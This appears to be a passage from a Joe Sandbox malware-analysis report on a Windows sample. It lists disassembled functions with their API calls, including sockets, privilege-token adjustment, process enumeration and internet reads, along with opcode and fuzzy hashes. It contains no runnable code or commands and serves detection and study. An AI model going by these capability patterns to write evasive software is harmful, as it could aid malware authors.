                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: 6364ff0160a628769e68977e2b964d5a9ed53d49e1a0cc4d209f2bfaebab2f25
                    • Instruction ID: e1a0cbc288cb7273214ef7ba4d0a4cc0b1bb9b0079441d9f3b9384c188fc8872
                    • Opcode Fuzzy Hash: 6364ff0160a628769e68977e2b964d5a9ed53d49e1a0cc4d209f2bfaebab2f25
                    • Instruction Fuzzy Hash: 4D216D316002049FCB50EF64C885B7EB7AAEF49720F148259FA56E73D1CB74AD018B6A
                    Function 00681287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 006819FA
                    • GetSysColor.USER32(0000000F), ref: 00681A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00681A61
                      • Part of subcall function 00681290: DefDlgProcW.USER32(?,00000020,?), ref: 006812D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: da6cfd4f515a62b54f0ca6ae6a3339774991a8f50b94c6db48b6de04cc842021
                    • Instruction ID: 40a54bf9d0503cdd0f6be4c39bc8d4091f42783167ecabb6472b64df645ced74
                    • Opcode Fuzzy Hash: da6cfd4f515a62b54f0ca6ae6a3339774991a8f50b94c6db48b6de04cc842021
                    • Instruction Fuzzy Hash: 70A104B1105544FADA29BB28DC99DFB299FDB43341B14431AF402DE2D2DF688D83937A
                    Function 006F6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 006F6AB1
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6ADA
                    • bind.WSOCK32(00000000,?,00000010), ref: 006F6B13
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F6B20
                    • closesocket.WSOCK32(00000000,00000000), ref: 006F6B34
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 39a04267573d446682836982bf562abb0d47118342be1ccfeb3ae200dcf90d09
                    • Instruction ID: 25736022f257b474d53a476cb247efd40e1af5fd1b59ce2b0b628053e1108f0f
                    • Opcode Fuzzy Hash: 39a04267573d446682836982bf562abb0d47118342be1ccfeb3ae200dcf90d09
                    • Instruction Fuzzy Hash: 3041E635700214AFEB50BF64DC86F7E77A69B08710F48825CFA5AAB3C2DA705D0187A5
                    Function 007055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 5d114b4d0ec9c82484816c62600f1603b72ea44a854a83592fbbca88d5db8bc1
                    • Instruction ID: eb7050fb724c502149b92b50582cce8dc554c5f281e1a4109acbf2731d8eaadf
                    • Opcode Fuzzy Hash: 5d114b4d0ec9c82484816c62600f1603b72ea44a854a83592fbbca88d5db8bc1
                    • Instruction Fuzzy Hash: B9119431700911EFEB216F26DC44A2F77DDEF44B21B858629F846D7281CB799901CEA9
                    Function 006FC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,006C1D88,?), ref: 006FC312
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 006FC324
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: 39a13b1d2d750811c382c1085051e5827d1daaac2a832e0957b66c27ab4b88d8
                    • Instruction ID: e61a5d374e7b827d98071fb663a6adc569ebe84d7a6fee55eeb96d07b20e5db2
                    • Opcode Fuzzy Hash: 39a13b1d2d750811c382c1085051e5827d1daaac2a832e0957b66c27ab4b88d8
                    • Instruction Fuzzy Hash: 15E0C2B520070BCFDB344F25C814AD676D5EF083A4F80C439E985C2750EB78D880CBA0
                    Function 006FF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 006FF151
                    • Process32FirstW.KERNEL32(00000000,?), ref: 006FF15F
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 006FF21F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 006FF22E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: c4a68931984d3900f7e57b30d7e7230b7456552a3cbb946f8c1c52b3e309e692
                    • Instruction ID: 2ecd67b075f7ccd223e7a794779b893063b3316c3de35f9e9a3eef104a95b64f
                    • Opcode Fuzzy Hash: c4a68931984d3900f7e57b30d7e7230b7456552a3cbb946f8c1c52b3e309e692
                    • Instruction Fuzzy Hash: 0D51AE715043009FD350EF24CC85A6BB7E9FF98710F144A2DF596932A1EB70EA08CB96
                    Function 006DEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006DEB19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: 9fd5648c5c855d9b4e17562c9d8e1c5111acc785ac8b4e3fe18ee8be17422e50
                    • Instruction ID: e70f68460c1e3c49ae9f0b6469805b7cf84122160a3e8afd8ff30e27c43cc52a
                    • Opcode Fuzzy Hash: 9fd5648c5c855d9b4e17562c9d8e1c5111acc785ac8b4e3fe18ee8be17422e50
                    • Instruction Fuzzy Hash: 30324675A007059FD728DF29C481AAAB7F1FF48310B15C46EE89ADB3A1E771E941CB44
                    Function 006F25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 006F26D5
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006F270C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 5031a4f0a66480ac0d64ae6abb80ce9cf989949054b097bf0f3f83ff1ad8506b
                    • Instruction ID: 109ff3fc482dc4b2d961ac5b2eb976ba1841114ab37c2b76a84260098dca6a36
                    • Opcode Fuzzy Hash: 5031a4f0a66480ac0d64ae6abb80ce9cf989949054b097bf0f3f83ff1ad8506b
                    • Instruction Fuzzy Hash: 9C41B37150420EBFEB20EB54DC95EBBB7BEEB41714F10406EF701E6240EA719E419E55
                    Function 006EB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 006EB5AE
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006EB608
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006EB655
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 690bf7f732c89ff208a128b63df1d864c80e4063d9a75ae4d2baa3c2d41c360c
                    • Instruction ID: 15084a7b38f6d4ac8cacb8c5ed8acbf2c7411eeffb6631eb002787f0e68a7732
                    • Opcode Fuzzy Hash: 690bf7f732c89ff208a128b63df1d864c80e4063d9a75ae4d2baa3c2d41c360c
                    • Instruction Fuzzy Hash: 82217135A00618EFCB00EFA5D884EEEBBB9FF48310F1481A9E905AB351DB319916CB55
                    Function 006D8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                    • GetLastError.KERNEL32 ref: 006D8D47
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 72b530c3460a995de2ef1d0db1b06149a13a37be5e9effd118ab7ce5304d4106
                    • Instruction ID: 2ca115de2409ed658cabdc247bb084b0925c82f36c1cdc81a802bd78311b4cd2
                    • Opcode Fuzzy Hash: 72b530c3460a995de2ef1d0db1b06149a13a37be5e9effd118ab7ce5304d4106
                    • Instruction Fuzzy Hash: 15118FB1814209AFE728AF54DC89D6BB7BEEF44710B20852EF85697641EF70BC418A64
                    Function 006E4021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006E404B
                    • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 006E4088
                    • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006E4091
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle
                    • String ID:
                    • API String ID: 33631002-0
                    • Opcode ID: 79987ef8281ce74f00dc1f78b988ebaea51b4f7c02d35bc32b3c90a515ac4376
                    • Instruction ID: 3a89c1dd16dc0a51120dbec563769e16d8f90afbf89263fa4580d6a540b8d098
                    • Opcode Fuzzy Hash: 79987ef8281ce74f00dc1f78b988ebaea51b4f7c02d35bc32b3c90a515ac4376
                    • Instruction Fuzzy Hash: 541170B1901328BEE7209BF9DC44FAFBBBCEB08750F004666FA04E7290C678594587A1
                    Function 006E4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 006E4C2C
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006E4C43
                    • FreeSid.ADVAPI32(?), ref: 006E4C53
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: 3a126db1774e4d415b3233e6a3d8e25049f90fae2106fbbe769f4f88db31587b
                    • Instruction ID: 479b98d87c46063f5c95bab92c504dad9ee16fddf49e15d9c870db363a795e7d
                    • Opcode Fuzzy Hash: 3a126db1774e4d415b3233e6a3d8e25049f90fae2106fbbe769f4f88db31587b
                    • Instruction Fuzzy Hash: 1CF04F75A1130CFFDF04DFF0DC89AAEB7BCEF08601F108569E501E2581D6745A048B54
                    Function 006E8B13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 006E8B25
                      • Part of subcall function 006A543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006E91F8,00000000,?,?,?,?,006E93A9,00000000,?), ref: 006A5443
                      • Part of subcall function 006A543A: __aulldiv.LIBCMT ref: 006A5463
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0ut
                    • API String ID: 2893107130-3725198356
                    • Opcode ID: 352922da08866050c9d3a18fdb648c4872745788ec9b9cc21f914dd15c485873
                    • Instruction ID: 13a5f69fe11141340fcfd7f01cb4fd9107d86984b2a74cdf61495ccfbe1dccf1
                    • Opcode Fuzzy Hash: 352922da08866050c9d3a18fdb648c4872745788ec9b9cc21f914dd15c485873
                    • Instruction Fuzzy Hash: 2721D5726256108FC329CF25D441A52B3E2EBA5311B288E6DD0E9CF2D0CB74BD05CB54
                    Function 0068E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 79e30b9dc9d875e316fae5a2c11d0f7f378ce3ded4bda6df2804776fcc56152e
                    • Instruction ID: 1f2f273b6b6f2820b661c4777bd8c059af24d29f146d84c526b34ece195a8acb
                    • Opcode Fuzzy Hash: 79e30b9dc9d875e316fae5a2c11d0f7f378ce3ded4bda6df2804776fcc56152e
                    • Instruction Fuzzy Hash: 7A229B74A00216CFDB24EF54C494ABEB7F2FF09300F148669E856AB351E776AD81CB91
                    Function 006EC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 006EC966
                    • FindClose.KERNEL32(00000000), ref: 006EC996
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 22af570ade54ef546b789ea6512b835b104ccb6240446a449e441f533bd4367e
                    • Instruction ID: 7af77731823e47205b097de23ee2a7f0ad24c8179c77cd8eb49689e593568185
                    • Opcode Fuzzy Hash: 22af570ade54ef546b789ea6512b835b104ccb6240446a449e441f533bd4367e
                    • Instruction Fuzzy Hash: 681165716106009FD710EF29D845A2AF7E5FF44324F04861EF9A6D7391DB34AC01CB95
                    Function 006EA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006F977D,?,0070FB84,?), ref: 006EA302
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006F977D,?,0070FB84,?), ref: 006EA314
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    • Opcode ID: 7b789d03f421990cc14012743f40b72dae153e8782d47157bf9933ff1ce2b9a4
                    • Instruction ID: c62513357c02d405434e03eb240a0213bee879a1e178d8b877eb7cfc9a57bbfe
                    • Opcode Fuzzy Hash: 7b789d03f421990cc14012743f40b72dae153e8782d47157bf9933ff1ce2b9a4
                    • Instruction Fuzzy Hash: 77F0893554531DF7DB20AFA4CC48FEA776DBF09761F008255F908D6141DA70A940CBA5
                    Function 006D8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006D8851), ref: 006D8728
                    • CloseHandle.KERNEL32(?,?,006D8851), ref: 006D873A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: cabd008867e27e0b9e3a4f61bf823be2bf34866110e98beb870ddbbd68bd6ce8
                    • Instruction ID: 616ded16a199a418c4e7c61b5d18f25252b9ef9f6e944a964d4ba4912cfcca4f
                    • Opcode Fuzzy Hash: cabd008867e27e0b9e3a4f61bf823be2bf34866110e98beb870ddbbd68bd6ce8
                    • Instruction Fuzzy Hash: 02E0B676010610EEE7752B60ED09D77BBAAEB057A0B25892DF4A684870DF62ACD0DB14
                    Function 006AA395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006A8F97,?,?,?,00000001), ref: 006AA39A
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006AA3A3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 34fff5d788b9196fb0e52e232185f936c6f053ae5fd39e238c66c91be3fba776
                    • Instruction ID: 964457f0154f1e348b9bb5837cba2b4ad026fd720ea60b1d39ec0bb36a7df188
